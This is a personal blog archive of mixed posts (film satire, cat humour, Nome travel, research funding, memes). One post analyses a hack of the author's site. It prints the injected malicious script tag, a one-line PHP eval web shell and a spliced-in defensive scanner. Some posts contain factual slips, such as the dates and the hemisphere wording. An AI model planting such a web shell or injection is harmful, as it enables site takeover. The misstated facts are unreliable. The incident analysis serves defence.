Movie Review: Snowpiercer

Last week, zaiah and I decided to spend an evening sitting in a dark room with a bunch of strangers staring passively at a flickering screen. We were in the mood for B science fiction, so we decided to go watch a low-budget sci-fi allegory about classism and economic repression whose characters are faced with losing body parts and whose plot heavily involves ice.

No, I don’t mean Ice Pirates. I mean the one that’s set on a train. I mean this one:

I must admit, it’s a worthy heir to the Ice Pirates crown. Without question, Snowpiercer is the best low-budget sci-fi allegory about classism and economic repression whose characters are faced with losing body parts and whose plot heavily involves ice that’s ever been set on a train.

The movie goes something like this:

Well-intentioned but incompetent scientists: Global warming is a thing. To fight global warming, we will spread a magic chemical in the air that will reduce global temperatures because magic, and also chemtrails. We will not model the results first, nor pay attention to the effects, because in this world modeling and verification are not things.

The WELL-INTENTIONED BUT INCOMPETENT SCIENTISTS spread MAGIC CHEMICALS in the AIR because MAGIC and also CHEMTRAILS. Global temperatures PLUMMET OVERNIGHT because THERMAL INERTIA ALSO ISN’T A THING.

Well-intentioned but incompetent scientists: Wow, we didn’t see that coming! The entire earth is now a frozen snowball and all life is extinct. Oops, our bad.

Jamie Bell: It sure does suck being one of the last human beings alive and being stuck in the back of this train. We should rebel and go to the front of the train. Chris Evans, you should lead us!
Chris Evans: Waitaminnit. If the world suddenly started freezing, why are the only survivors on a train? Why wouldn’t people make domed cities? Or dig shelters underground? For that matter, how come this train is even moving? Where does it get its fuel from?
Jamie Bell: It has a perpetual motion engine, of course! Duh.
Chris Evans: Oh, boy. It’s going to be one of those movies. And I thought my role in Captain America: The Winter Soldier was implausible. Man, I have got to talk to my agent about these winter-themed movies I keep getting cast in.


Conversations with a kitty

This is our cat Beryl. He’s a blue solid Tonkinese, a cat breed that’s made of one part kitty, three parts fearlessness, and sixteen parts love. Tonks are absolutely amazing kitties, with all of the cute adorableness of your standard-issue cat without any of the surly sociopathy.

A couple days ago, I received a package in the mail. On the same day, I went out to buy new printer ink cartridges and came home with a new black and white laser printer, which was cheaper than a set of replacement ink cartridges because capitalism and market efficiencies and invisible guiding hand and Adam Smith LOL.

Anyway, Beryl and I had a conversation that went something like this:

Me: Hey, kitty! Look! I brought you a present! It’s an empty box!

Beryl: OMG you are the BEST. A box! This is amazing! Thank you! Thank you so much! From here I can hide and pounce on Liam all unawares and stuff.

Me: And check this out! I got a new printer, so here’s another empty box.

Beryl: TWO empty boxes? Truly, my cup runneth over. I don’t think I’ve been this happy since…since…since ever! Now I can hop from one box to another. The cunning box-ambush strategies I can devise with TWO boxes will make me the undisputed champion of my domain. You are the greatest. Truly, I mean that. And it’s not just the boxes, it’s also the food preparation. I will remember you in the long years of my reign.

Me: Okay, I need some more space to set up this printer. Here, let me just put this box inside the other box…

Beryl:

Beryl: The hell?

Beryl: You…you just…

Beryl: There is an empty box inside another empty box!

Beryl: You…I…it…

Beryl: How is this even possible? I can hop into a box, and when I get there, there is..another box! Another box, that I can ALSO hop into!

Beryl: I can be inside TWO BOXES AT THE SAME TIME.

Beryl: How did you make this happen?

Beryl: You are like a god. Like. A. God. A god of boxes. You…I never even…it’s just so beautiful!

Beryl: Never in all my life have I imagined such a thing. You have opened my eyes to the Possible, and truly is it more amazing than I had ever dared to hope.

Beryl: Two boxes. TWO boxes. One box inside…inside the other…I’m having a moment.

Me: I’m glad I could make you happy, little buddy.

Beryl: Happy? Happy? Happy is getting the squishy food. Happy is having ONE box to play with. Happy is sitting on your shoulder while you do that thing where you sit in front of that glowing thing and you pretend like you’re a mage and you press buttons and throw frostbolts around and you swear at the goddamn hunter who always pulls aggro and is never where he’s supposed to be and…

Me: You mean play World of Warcraft?

Beryl: Yes, that. Happy is sitting on your shoulder while you do that. But this…this is…

Beryl: If Voluptas, the goddess of bliss born of the union between Cupid and Psyche, had been capable of feeling what I’m feeling right now, the entire story of the world would be rewritten. Temples in her name would stand still as the greatest of all human accomplishments. If you could package what I’m feeling and distribute it, wars would end, ancient rivalries would be forgotten, petty jealousy would be as extinct as the Stegosaurus.

Me: I’m just glad you like your boxes.

Me: Wait, how the hell do you know about Roman mythology? You’re a cat!

Beryl: Can’t talk. Busy playing. In boxes.

Nome, Alaska: There’s gold on that ther beach!

Nome, Alaska was incorporated as a town in 1901, because of a gold rush. In the late 1800s, gold was discovered in the mountains around Nome; in the early 1900s, more gold was discovered in the sand on the edge of the Bering Sea.

There’s still lots of gold in Nome. While there’s no longer a full-on gold rush, there’s still considerable gold mining around Nome, and some of its beaches are designated for “recreational mining.”

For three months out of the year, Nome’s beaches are home to the strangest temporary communities you will find outside Burning Man. But these are not well-off techie hipsters who take drugs and dance around a giant fire. They’re folks from Canada and the United States who head up to Nome, where they set up tents and build makeshift houses from reclaimed materials (shipping pallets, old signs, and whatever else they can find) to spend the summer months sifting the beach sand for gold.

There are all kinds of rules on recreational gold mining. Each “claim” is at most 75 feet wide; claims are temporary and evaporate at the end of the season or when you move off the beach; there’s a limit of 40 ounces of gold per person or group per year, which is about $52,000 worth at current market prices. There are limits on the equipment that can be used.

The people who do this are a really interesting bunch. We talked to several folks on the beach, most of whom come up year after year to look for gold. The people we met were friendly and outgoing, willing to show us their equipment and talk about their favorite techniques. Most were cagey about the amount of gold they find every year, but my impression was they generally tend to get about the 40-ounce limit.

Or at least that’s what they declare at the end of the season.

There’s industrial-scale mining as well, but to me, the hobbyist mining is absolutely fascinating.

Summer in Nome is strange: the sun barely ever sets (it’s a little freaky to go outside at midnight and see the sun still high in the sky), so the beach miners tend to work whenever they are awake and sleep whenever they’re tired–there seems to be little in the way of set schedules. The temperature was pleasant while we were there, though apparently near-constant light rain and occasional storms are normal during parts of the summer. It is still Alaska, which means the environment is still hostile enough to produce the occasional odd survival event without warning; as a result, the community tends to be close-knit, with everyone watching out for everyone else…interesting to see in folks who are prone to say they enjoy doing this every year at least partly to get away from other people.

The sand on the beach looks like this. The red color apparently indicates rich gold-bearing sand.

I’m actually considering going up there next year and spending the summer living on the beach panning for gold. Not because I expect to find any or to strike it rich, mind, but simply for the experience of it. It would make one hell of a “how I spent my summer vacation” story! (There are rumors the state will not be permitting hobbyist mining on the beach next year, though these rumors seem to have been circulating for years–one person we talked to said he heard the same thing several years back when he did it for the first time.)

Back in the 1940s and 1950s, it was common to mine for gold using enormous dredging machines like this one, now in ruins and slowly crumbling into the tundra:

These gigantic hulks are dotted all over the landscape around Nome. They were expensive to build and ship, and woefully inefficient–at best, they might recover 40% of the gold from the sand. In fact, the tailings left behind by these old machines are being mined again with more efficient techniques, and the amount of gold left in them is quite high.

I’m not sure I want to be doing this, but I am very sure I want to have done it. The book that would come out of this experience would be amazing.

Some thoughts on government funding for research

Every time you buy a hard drive, some of your money goes to the German government.

That’s because in the late 1990s, a physicist named Peter Grünberg at the Forschungszentrum Jülich (Jülich Research Center) made a rather odd discovery.

The Jülich Research Center is a government-funded German research facility that explores nuclear physics, geoscience, and other fields. There’s a particle accelerator there, and a neutron scattering reactor, and not one or two or even three but a whole bunch of supercomputers, and a magnetic confinement fusion tokamak, and a whole bunch of other really neat and really expensive toys. All of the Center’s research money comes from the government–half from the German federal government and half from the Federal State of North Rhine-Westphalia.

Anyway, like I was saying, in the late 1990s, Peter Grünberg made a rather odd discovery. He was exploring quantum physics, and found that in a material made of several layers of magnetic and non-magnetic materials, if the layers are thin enough (and by “thin enough” I mean “only a few atoms thick”), the material’s resistance changes dramatically when it’s exposed to very, very weak magnetic fields.

There’s a lot of deep quantum voodoo about why this is. Wikipedia has this to say on the subject:

If scattering of charge carriers at the interface between the ferromagnetic and non-magnetic metal is small, and the direction of the electron spins persists long enough, it is convenient to consider a model in which the total resistance of the sample is a combination of the resistances of the magnetic and non-magnetic layers.

In this model, there are two conduction channels for electrons with various spin directions relative to the magnetization of the layers. Therefore, the equivalent circuit of the GMR structure consists of two parallel connections corresponding to each of the channels. In this case, the GMR can be expressed as

Here the subscript of R denote collinear and oppositely oriented magnetization in layers, χ = b/a is the thickness ratio of the magnetic and non-magnetic layers, and ρN is the resistivity of non-magnetic metal. This expression is applicable for both CIP and CPP structures.

Make of that what you will.


Conservatives and Libertarians have a lot of things in common. In fact, for all intents and purposes, libertarians in the United States are basically conservatives who are open about liking sex and drugs. (Conservatives and libertarians both like sex and drugs; conservatives just don’t cop to it.)

One of the many areas they agree on is that the government should not be funding science, particularly “pure” science with no obvious technological or commercial application.

Another thing they have in common is they don’t understand what science is. In the field of pure research, you can never tell what will have technological or commercial application.

Back to Peter Grünberg. He discovered that quantum mechanics makes magnets act really weird, and in 2007 he shared a Nobel Prize with French physicist Albert Fert, a researcher at the French Centre national de la recherche scientifique (French National Centre for Scientific Research), France’s largest government-funded research facility.

And it turns out this research had very important commercial applications:

You know how in the 80s and 90s, hard drives were these heavy, clunky things with storage capacities smaller than Rand Paul’s chances at ever winning the Presidency? And then all of a sudden they were terabyte this, two terabyte that?

Some clever folks figured out how to use this weird quantum mechanics voodoo to make hard drive heads that could respond to much smaller magnetic fields, meaning more of them could be stuffed on a magnetic hard drive platter. And boom! You could carry around more storage in your laptop than used to fit in a football stadium.

It should be emphasized that Peter Grünberg and Albert Fert were not trying to invent better hard drives. They were government physicists, not Western Digital employees. They were exploring a very arcane subject–what happens to magnetic fields at a quantum level–with no idea what they would find, or whether it would be applicable to anything.


So let’s talk about your money.

When it became obvious that this weird quantum voodoo did have commercial possibility, the Germans patented it. IBM was the first US company to license the patent; today, nearly all hard drives license giant magnetoresistance patents. Which means every time you buy a hard drive, or a computer with a hard drive in it, some of your money flows back to Germany.

Conservatives and libertarians oppose government funding for science because, to quote the Cato Institute,

[G]overnment funding of university science is largely unproductive. When Edwin Mansfield surveyed 76 major American technology firms, he found that only around 3 percent of sales could not have been achieved “without substantial delay, in the absence of recent academic research.” Thus some 97 percent of commercially useful industrial technological development is, in practice, generated by in-house R&D. Academic science is of relatively small economic importance, and by funding it in public universities, governments are largely subsidizing predatory foreign companies.

Make of that what you will. I’ve read it six times and I’m still not sure I understand the argument.

The Europeans are less myopic. They understand two things the Americans don’t: pure research is the necessary foundation for a nation’s continued economic growth, and private enterprise is terrible at funding pure research.

Oh, there are a handful of big companies that do fund pure research, to be sure–but most private investment in research comes after the pure, no-idea-if-this-will-be-commercially-useful, let’s-see-how-nature-works variety.

It takes a lot of research and development to get from the “Aha! Quantum mechanics does this strange thing when this happens!” to a gadget you have in your home. That also takes money and development, and it’s the sort of research private enterprise excels at. In fact, the Cato Institute cites many examples of biotechnology and semiconductor research that are privately funded, but these are types of research that generally already have a clear practical value, and they take place after the pure research upon which they rest.

So while the Libertarians unite with the Tea Party to call for the government to cut funding for research–which is working, as government research grants have fallen for the last several years in a row–the Europeans are ploughing money into their physics labs and research facilities and the Superconducting Supercollider, which I suspect will eventually produce a stream of practical, patentable ideas…and every time you buy a hard drive, some of your money goes to Germany.

Modern societies thrive on technological innovation. Technological innovation depends on understanding the physical world–even when it seems at first like there aren’t any obvious practical uses for what you learn. They know that, we don’t. I think that’s going to catch up with us.

Nome, Alaska: Ruins of the White Alice facility

There’s a mountain overlooking Nome. It’s called Anvil Mountain, and on that mountain is a kind of monument to the Cold War. You can see it from just about anywhere in town. These four enormous antennas squat over the landscape, a silent testament to the money and lives squandered on endless political bickering.

When I saw them, I had to check them out.

These four antennas are part of the old “White Alice” system, a communication system that was part of the old Distant Early Warning radar installation all along Alaska, constantly searching the sky for signs of Russian bombers sneaking over the Arctic and heading across Canada toward the United States.

The system was designed in the 1950s, when fear of the Commies was really starting to gain traction. The Distant Early Warning line was a set of remote high-powered radar facilities all along Alaska, but the designers had a problem. Alaska is huge. If you count the string of islands that extends from its western edge, many of which were home to DEW radar, Alaska is about the same distance stem to stern as the distance from California to New York.

And there are no roads, no telephone lines, and no power lines. Even today, there is no way to get to Nome by road; roads linking it to the rest of Alaska simply do not exist. You get in and out by air or barge, and that’s it.

The radar stations along the DEW line needed to be able to talk to command and control centers. Normal radio wouldn’t work; Alaska is so large that the curve of the earth renders line-of-sight radio unworkable.

So the Air Force came up with an idea: troposphere scattering. Basically, they decided to use enormous antennas pointed at the horizon to blast an immensely powerful radio signal, so strong it would bounce and scatter from the upper layers of the atmosphere, reaching stations beyond the curve of the earth.

The system was code-named “White Alice” and was built at enormous cost in the 1950s and operated through the 1970s, when satellite communication made it obsolete. By the time it was decommissioned, there were 71 of these stations, including the one on Anvil Mountain.

I borrowed a 4×4 and drove up the mountain. The facility is surrounded by a chain-link fence that has long since been pulled down and yanked apart in places. An ancient, battered sign warns trespassers that it’s a restricted area; the locals seem to use it for target practice.

The White Alice installations were powered by enormous diesel generators. Each of the four antennas at a facility consumed up to 10 kW of power; the generators provided power for the transmitters, the living quarters, and small line-of-sight microwave dishes that provided short-range communication.

Most of the White Alice facilities have been completely dismantled. Several of them are toxic waste sites, as diesel fuel and other contaminants have been dumped all over the place.

When the Anvil Mountain White Alice facility was decommissioned, the residents of Nome asked the Corps of Engineers to leave the four big antennas. Everything else is gone.

These antennas are huge–about five stories tall.

Cost overruns, under-engineered specifications, and overly optimistic maintenance projections made the White Alice project run ten times over budget. Most of the materials to build the installations–hundreds of tons of equipment for each one–were shipped to remote mountain peaks by dogsled. Airbases were constructed at many of the sites to get fuel, people, and supplies in and out. Technicians worked at these sites year round, facing minus 30 degree weather or worse during the winter.

We went up twice, once during the afternoon and once at 1:30 in the morning to watch the simultaneous sunrise and sunset. I can only imagine how miserable it must have been to work here; in the middle of one of the warmest summers on record, when Nome was facing over-70-degree weather, it was cold and windy on top of the mountain. Winter, when the sun hardly comes up, must have been brutal.

I used my smartphone to take a panorama showing the whole installation from the very peak of Anvil Mountain.

Wrong in the age of Google: Memes as social identity

A short while ago, I published a tweet on my Twitter timeline that was occasioned by a pair of memes I saw posted on Facebook:

The memes in question have both been circulating for a while, which is terribly disappointing now that we live in the Golden Age of Google. They’re being distributed over an online network of billions of globally-connected devices…an online network of billions of globally-connected devices which lets people discover in just a few seconds that they aren’t actually true.

A quick Google search shows both of these memes, which have been spread across social media countless times, are absolute rubbish.

The quote attributed to Albert Einstein appears to have originated with a self-help writer named Matthew Kelly, who falsely attributed it to Einstein in what was probably an attempt to make it sound more legitimate. It doesn’t even sound like something he would have said.

The second is common on conservative blogs and decries the fact that Obamacare (or, sometimes, Medicaid) offers free health coverage to undocumented immigrants. In fact, Federal law bars undocumented immigrants from receiving Federal health care services or subsidies for health insurance, with just one exception: Medicaid will pay hospitals to deliver babies of undocumented mothers (children born in the United States are legal US citizens regardless of the status of their parents).

Total time to verify both of these memes on Google: less than thirty seconds.

So why, given how fast and easy it is to verify a meme before reposting it, does nobody ever do it? Why do memes that can be demonstrated to be true in less time than it takes to order a hamburger at McDonald’s still get so much currency?

The answer, I think, is that it doesn’t matter whether a meme is true. It doesn’t matter to the people who post memes and it doesn’t matter to the people who read them. Memes aren’t about communication, at least not communication of facts and ideas. They are about social identity.


Viewed through the lens of social identity, memes suddenly make sense. The folks who spread them aren’t trying to educate, inform, or communicate ideas. Memes are like sigils on a Medieval lord’s banner: they indicate identity and allegiance.

These are all memes I’ve seen online in the last six weeks. What inferences can we make about the people who posted them? These memes speak volumes about the political identities of the people who spread them; their truthfulness doesn’t matter. We can talk about the absurdity of Oprah Winfrey’s reluctance to pay taxes or the huge multinational banks that launder money for the drug cartels, and both of those are conversations worth having…but they aren’t what the memes are about.

It’s tempting to see memes as arguments, especially because they often repeat talking points of arguments. But I submit that’s the wrong way to view them. They may contain an argument, but their purpose is not to try to argue; they are not a collective debate on the merits of a position.

Instead, memes are about identifying the affiliations of the folks who post them. They’re a way of signaling in-group and out-group status. That makes them distinct from, say, the political commentary in Banksy’s graffiti, which I think is more a method of making an argument. Memes are a mechanism for validating social identity. Unlike graffiti, there’s no presupposition the memes will be seen by everyone; instead, they’re seen by the poster’s followers on social media–a self-selecting group likely to already identify with the poster.

Even when they’re ridiculously, hilariously wrong. Consider this meme, for example. It shows a photograph of President Barack Obama receiving a medal from the king of Saudi Arabia.

The image is accurate, though the caption is not. The photo shows Barack Obama receiving the King Abdul Aziz Order of Merit from King Abdullah. It’s not unconstitutional for those in political office to receive gifts from foreign entities, provided those gifts are not kept personally, but are turned over to the General Services Administration or the National Archives.

But the nuances, like I said, don’t matter. It doesn’t even matter that President George W. Bush received the exact same award while he was in office:

If we interpret memes as a way to distribute facts, the anti-Obama meme is deeply hypocritical, since the political conservatives who spread it aren’t bothered that a President on “their” side received the same award. If we see memes as a way to flag political affiliation, like the handkerchiefs some folks in the BDSM community wear in their pockets to signal their interests, it’s not. By posting it, people are signaling their political in-group.

Memes don’t have to be self-consistent. The same groups that post this meme:

also tend by and large to support employment-at-will policies giving employers the right to fire employees for any reason, including reasons that have nothing to do with on-the-job performance…like, for instance, being gay, or posting things on Facebook the employer doesn’t like.

Memes do more than advertise religious affiliation; they signal social affiliation as well.

Any axis along which a sharp social division exists will, I suspect, generate memes. I also suspect, though I think the phenomenon is probably too new to be sure, that times of greater social partisanship will be marked by wider and more frequent distribution of memes, and issues that create sharper divides will likewise lead to more memes.

There are many ideas that are “identity politics”–ideas that are held not because they’re supported by evidence, but simply because they are a cost of entry to certain groups. These ideas form part of the backbone of a group; they serve as a quick litmus test of whether a person is part of the out-group or the in-group.

For example, many religious conservatives reflexively oppose birth control for women, even if the majority of their members, like the majority of women in the US at large, use it. Liberals reflexively oppose nuclear power, even though it is by far the safest source of power on the basis of lives lost per terawatt hour of electricity produced. The arguments used to support these ideas (“birth control pills cause abortions,” “nuclear waste is too dangerous to deal with”) are almost always empirically, demonstrably false, but that’s irrelevant. These ideas are part of a core set of values that define the group; holding them is about communicating shared values, not about true and false.

Unfortunately, these core identity ideas often lead directly not only to misinformation and a distorted worldview, but to actual human suffering. Opposition to vaccination and genetically modified foods are identity ideas among many liberals; conservatives oppose environmental regulation and deny human involvement in climate change as part of their identity ideas. These ideas have already led to human suffering and death, and are likely to lead to more.

Human beings are social animals capable of abstract reasoning, which perhaps makes it inevitable that abstract ideas are so firmly entrenched in our social structures. Ideas help define our social structures, identify in-group and out-group members, and signal social allegiances. The ideas we present, even when they take the form of arguments, are often not attempts at dialog so much as flags that let others know which lord we march for. Social media memes are, in that way, more accurately seen as house sigils than social discourse.

More Than Two hack

As most of you know, I do computer security as a hobby. (Browse the Computer Security and Computer Viruses tags on this blog to see what I mean.) So it was with a measure of embarrassment I discovered, while at Atlanta Poly Weekend in June, the More Than Two Web site had been hacked.

I first became aware there was a problem when visiting the site on a phone showed this:

I investigated and discovered that malicious code had been added to the bottom of each page, just below the closing body tag. The following code had been injected:

<noindex>
<script src="http://stat.rolledwil.biz/stat.php?1921853954">
</script>
</noindex>

I spent the next few hours not going to panels or workshops, but instead looking at logs, talking to my hosting provider, and investigating the source of the attack. Fortunately, an old friend of mine from Atlanta who does computer security professionally happened to be at the convention, and I spent some time talking to him, too.

A malicious file that offered people a back door into the site had been added, and files had been tampered with to inject the hostile code into HTML pages.

I quickly discovered the attack was targeted only at Android browsers, and only certain versions of Android (as near as I can tell, versions equal to or less than 4.0).

The site at stat.rolledwil.biz returned a 404 Not Found whenever I tried to visit it directly. In addition, non-Android mobile browsers and desktop browsers didn’t return the error.

I removed the malicious files and the hack, and then set about figuring out what had happened and what its purpose was. What I found was interesting.


The malicious site at stat.rolledwil.biz was served by Cloudflare, the spam and malware sewer that figures prominently in problems I’ve written about here and here. I emailed Cloudflare, and received a terse reply that the actual host was an outfit called Digital Ocean. I emailed them, and they quickly shut down the malware server.

The number that appears after the question mark in the line

<script src="http://stat.rolledwil.biz/stat.php?1921853954">

is an encoded version of the IP address of the More Than Two server. The first thing this script does is check the browser referrer against this encoded IP address. If they aren’t the same, it returns a 404. Basically, it looks to see if the script is being called from a hacked Web site. If it isn’t, then it’s probably a security researcher trying to figure out what the script does, so it sends back a 404.

The next thing it does is look at the browser’s user agent–the thing that tells a Web site what kind of browser you’re using. If it isn’t Android, it also redirects to a 404. The flow looks like this:

So only if the call appears to be coming from an Android browser visiting a hacked Web site does the malicious script get served up. The script produces the alert dialog shown above, and tries to redirect to a URL in Eastern Europe (not functioning at the time I observed this).

The initial attack vector seems to be a variety of the Mayhem worm targeting Web servers. My Web hosting company was apparently vulnerable (the problem has since been fixed), and the exploit was used to drop a malicious PHP file on my server. The PHP file looked like this:

<?php @eval(stripslashes($_REQUEST[ev]));

If you know PHP, you’re probably filled with a sinking feeling of horror and dread looking at that. Basically, it allows a person to execute commands on a Web server from a browser.

From here, the attackers modified the files on the Web server to inject the malicious HTML into Web pages.
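A defender-side check for the two artifacts described above, the PHP file that evaluates request input and the injected external script tag with an all-digit query string. This is an added example, not code from the original post; the hostnames, file names and the `scan_tree` helper are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# PHP that hands request input straight to eval(), like the dropped file above.
EVAL_REQUEST = re.compile(
    r"eval\s*\(\s*(?:\w+\s*\(\s*)*\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I)
# <script src> with an absolute URL whose query string is nothing but digits.
NUMERIC_SCRIPT = re.compile(
    r"<script[^>]+src\s*=\s*[\"']?(https?://([^/\"'\s>]+)/[^\"'\s>?]*\?\d+)(?![\w=&])",
    re.I)
SCANNED_SUFFIXES = {".php", ".html", ".htm", ".js"}

def scan_tree(root, own_hosts=()):
    """Return sorted (relative_path, finding) pairs for files under root."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCANNED_SUFFIXES:
            continue
        text = path.read_text(errors="replace")
        rel = path.relative_to(root).as_posix()
        if EVAL_REQUEST.search(text):
            findings.append((rel, "eval-of-request-input"))
        for match in NUMERIC_SCRIPT.finditer(text):
            host = match.group(2).lower()
            if host not in own_hosts:  # the site's own hosts are expected
                findings.append((rel, "external-script:" + host))
    return sorted(findings)

def build_sample_site(root):
    """Write a constructed sample web root: two clean files, two tampered."""
    root = Path(root)
    (root / "inc").mkdir()
    (root / "index.html").write_text(
        '<script src="http://www.example.test/js/site.js?20140601"></script>')
    (root / "inc" / "form.php").write_text(
        "<?php echo htmlspecialchars($_REQUEST['q']);")
    (root / "about.html").write_text(
        '<p>About</p><script src="http://stat.attacker.test/stat.php?1234567890">'
        "</script>")
    (root / "inc" / "cache.php").write_text(
        "<?php @eval(stripslashes($_REQUEST[ev]));")

def demo():
    """Build the constructed site in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        return scan_tree(tmp, own_hosts={"www.example.test"})

if __name__ == "__main__":
    for rel, finding in demo():
        print(rel, finding)
```

Pattern matching like this only catches the unobfuscated forms shown in the post, so it complements rather than replaces comparing the web root against a known-good copy.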

The server has been fixed, the CMS I use has been updated, and I’ve taken other steps to ensure against a repeat attack. The attack vector was closed the day after I discovered it, but I didn’t write about the attack until I had finished analyzing it and had a good understanding of exactly what happened and how it worked.

The fact this attack was as sophisticated as it was and was aimed, not at Windows, but at Android, is interesting.


There’s a postscript to this. The malicious attack site was served up by Cloudflare, the content distribution network with a reckless disregard for security and abuse. I notified the actual Web host, Digital Ocean, about the attack, and they had disabled the site by June 11.

However, a month after being told the site was serving malware and being used as part of a Web attack, and almost a month after the site had been disabled, Cloudflare was still trying to serve its content:

Cloudflare appears indifferent to even the most egregious abuse, and will continue to provide services to abusive Web sites long after they’re notified of the abuse, and even long after the sites’ hosts have shut them down. I’m not quite sure what to make of that, but I’m becoming more and more convinced Cloudflare is a menace to the Internet.

Nome, Alaska: Simultaneous Sunrise and Sunset

The sun rises in the east and sets in the west, as every fule know.

What we don’t often think about is this is really true only at the equator, and even there it’s only entirely true during the solstices. For people anywhere else, or at any other time, the sun actually rises in the northeast and sets in the northwest (if you’re in the southern hemisphere) or rises in the southeast and sets in the southwest (if you’re in the southern hemisphere). Or at least it would, if the earth weren’t tilted on its axis.

Since the earth is tilted, not only does the sun generally not rise and set at locations 180 degrees apart from each other, the location of sunrise and sunset wobbles as the year goes on.

When you’re north of the Arctic Circle, things get really weird.

At the summer solstice, the sun doesn’t set at all, and during the winter solstice, it never rises. The rest of the time, it makes circles in the sky. The circles wobble as the year goes by…during the summer, most of the circle is above the horizon, and as winter comes, the circle sinks below the horizon. (So, if you plot the path of the sun in the sky–when it is in the sky–over the course of time, it actually does a spiral.)

Last night, I climbed to the top of Anvil Mountain just outside Nome, Alaska (which is near enough to the Arctic Circle to see some of the weirdness) at 2 o’clock in the morning to watch the “sunset.” I say “sunset” because it’s still pretty much full daylight out. The sun dips just barely below the edge of the horizon, but it doesn’t stay there, and it comes up again shortly thereafter…meaning we saw a simultaneous sunset and sunrise.

The red in the sky on the left of this panorama is the sunset. The red in the sky on the right is sunrise. The sun is traveling in a shallow arc that just barely dips beneath the horizon.


Nome, Alaska: The Last Train to Nowhere

As the result of a lengthy and somewhat improbable series of events, I’m in Nome, Alaska, working on another book.

A few days back, we took a drive on the one road that goes through Nome. Nome is inaccessible by car; the only road links it to the nearby towns of Council and Teller.

If you drive out toward Council, a trip I recommend only during the summer and then only in a large 4WD vehicle, about twenty miles from Nome you’ll come across the long-deserted ghost town of Solomon, a leftover from the gold rush in the early 1900s. Near Solomon, you’ll find what’s left of a failed attempt to bring rail service to Nome.

In 1903, an enterprising group of people formed a company to build a railroad to serve the gold mines near Solomon. They bought a bunch of secondhand elevated railway engines from New York City and hauled them up to Nome by barge.

In 1907, a storm washed out the one rail bridge between Solomon and Nome, leaving the trains stranded on the edge of the water. The company folded and simply walked away, leaving the trains where they were, to quietly rust away into the tundra.

That seems to be a common theme in Alaska. The landscape is dotted with abandoned mining equipment, wrecked construction vehicles, and huge pieces of machinery simply left where they were when they became inoperable.

The locals call this steam engine graveyard “The Last Train to Nowhere.”

Even during the summer, it’s cold and windy here. The train never was reliable under the best of circumstances, so it’s no surprise there was no effort to replace it.